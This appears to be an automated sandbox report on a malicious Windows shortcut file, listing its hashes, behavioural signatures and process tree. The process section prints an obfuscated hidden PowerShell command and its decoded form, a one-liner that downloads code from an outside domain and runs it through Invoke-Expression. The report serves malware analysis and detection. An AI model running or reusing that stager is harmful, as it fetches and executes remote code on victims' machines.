Analysis

max time kernel: 120s
max time network: 123s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 06-04-2024 01:11
Static task: static1

Behavioral task: behavioral1
Sample: DOC692 - 692692.lnk
Resource: win7-20240221-en
4 signatures, 150 seconds

Behavioral task: behavioral2
Sample: DOC692 - 692692.lnk
Resource: win10v2004-20240226-en
8 signatures, 150 seconds
General

Target: DOC692 - 692692.lnk
Size: 9KB
MD5: a344b567076691b5cd838512c99bc884
SHA1: 0de4ad8f9f127c0c444bb7db4459d0977b1f6506
SHA256: decbd662ecab295cb2c060232a6de8218843d671b7cb628aaf769ba4bcdf126f
SHA512: ad6d3fed7647c933c9a23938f7c39a8799d5845cd6a9e1fec6d0a2044c740795d428e89467c4e5b1f8217217f272863438b68e160da312d6ae8498af9688dd98
SSDEEP: 192:8z5phm3MSBfQbxE4l2g9FWV4FBno2dzSkbP43O5yrf68g493f61hVNeXkI:u5fcMS5Qb6EouFB3dzBbw3Omf68Zp9XV

Score: 3/10
Malware Config

Signatures

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoCs)
Processes:
  pid 2548  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes:
  description: Token: SeDebugPrivilege  pid 2548  powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
Processes:
  description: PID 2376 wrote to memory of 2548  pid 2376  cmd.exe  target: powershell.exe
  description: PID 2376 wrote to memory of 2548  pid 2376  cmd.exe  target: powershell.exe
  description: PID 2376 wrote to memory of 2548  pid 2376  cmd.exe  target: powershell.exe
Processes

1. C:\Windows\system32\cmd.exe
   Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\DOC692 - 692692.lnk"
   PID: 2376
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 2376)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -WindowStyle Hidden -Enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBpAG0AYQBuAGkAawB1AHUALgBjAG8AbQAvAGQAbwBuAGUALgB0AHgAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAIAB8ACAAaQBOAHYATwBrAEUALQBFAHgAUAByAGUAUwBzAGkATwBuAA==
      Decoded -Enc argument (base64 of UTF-16LE text): (iwr https://imanikuu.com/done.txt -UseBasicParsing).Content | iNvOkE-ExPreSsiOn
      PID: 2548
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken